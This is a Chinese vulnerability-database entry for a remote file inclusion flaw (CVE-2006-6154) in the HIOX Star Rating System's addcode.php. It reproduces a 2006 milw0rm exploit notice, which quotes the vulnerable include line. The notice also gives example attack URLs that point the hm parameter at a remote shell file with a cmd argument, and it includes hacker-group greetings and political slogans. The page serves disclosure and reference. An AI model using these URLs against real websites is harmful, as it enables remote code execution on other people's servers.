HIOXS Star Rating System Addcode.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111647 漏洞类型 输入验证
发布时间 2006-11-23 更新时间 2008-07-30
CVE编号 CVE-2006-6154 CNNVD-ID CNNVD-200611-446
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2838
https://www.securityfocus.com/bid/21280
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-446
|漏洞详情
HIOXStarRatingSystemScript(HSRS)的addcode.php中存在PHP远程文件包含漏洞,远程攻击者可通过hm参数中的URL执行任意PHP代码。
|漏洞EXP
--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php)  Remote File
Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            HSRS 1.0 (HIOX Star Rating System Script)
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-23
# Remote:    Yes
# Type:      High
# Site:      http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.

==========================

file ;

addcode.php

==========================

 include "$hm/auth/config.php";

======================================================
Example:

http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd

======================================================
Exploit :

Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd


======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-23]
|受影响的产品
hscripts HIOX Star Rating System 1.0
|参考资料

来源:BID
名称:21280
链接:http://www.securityfocus.com/bid/21280
来源:MILW0RM
名称:2838
链接:http://www.milw0rm.com/exploits/2838
来源:VUPEN
名称:ADV-2006-4689
链接:http://www.frsirt.com/english/advisories/2006/4689
来源:SECUNIA
名称:23078
链接:http://secunia.com/advisories/23078
来源:XF
名称:hsrs-addcode-file-include(30527)
链接:http://xforce.iss.net/xforce/xfdb/30527
来源:BUGTRAQ
名称:20080730HIOXStarRatingSystem1.0RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/494928/100/0/threaded
来源:MILW0RM
名称:2838
链接:http://milw0rm.com/exploits/2838